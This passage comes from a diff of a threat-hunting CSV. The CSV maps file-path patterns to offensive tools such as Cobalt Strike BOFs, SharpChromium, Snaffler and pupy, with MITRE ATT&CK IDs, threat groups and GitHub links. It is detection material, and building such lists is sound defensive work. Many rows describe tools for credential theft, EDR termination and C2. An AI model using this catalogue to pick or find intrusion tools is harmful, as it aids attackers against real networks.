- T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*/ServiceName:TokenDriver*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*/Services/TransitEXE.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/Services/TransitEXE.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/servicetags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/SetProcessInjection.git*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" -"*/setuserpass.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/setuserpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/SetProcessInjection.git*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*/setuserpass.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/setuserpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/sfp_openphish.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/sfp_spider.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/sh_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" 
"*/s-h-3-l-l/*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*/shadowcoerce.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/shadowcoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/ShadowForgeC2*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*/ShadowSpray.git*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" 
"*/ShadowSpray/*.cs*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*/share/windows-resources/wce*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" -"*/share_enum.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/ShareFinder.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - 
T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/Sharefinder.ps1","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/share_enum.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/ShareFinder.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - 
T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/Sharefinder.ps1","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/shares-with-SCF.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/SharpAzbelt.git*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*/SharpBlackout.git*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" 
@@ -5171,29 +5227,29 @@ "*/SharpCat/*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" "*/SharpChromium.git*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*/SharpCloud.git*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential 
Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" -"*/SharpCollection/*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/SharpCollection/*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*/SharpCompile/*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*/sharpcompile_*.*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
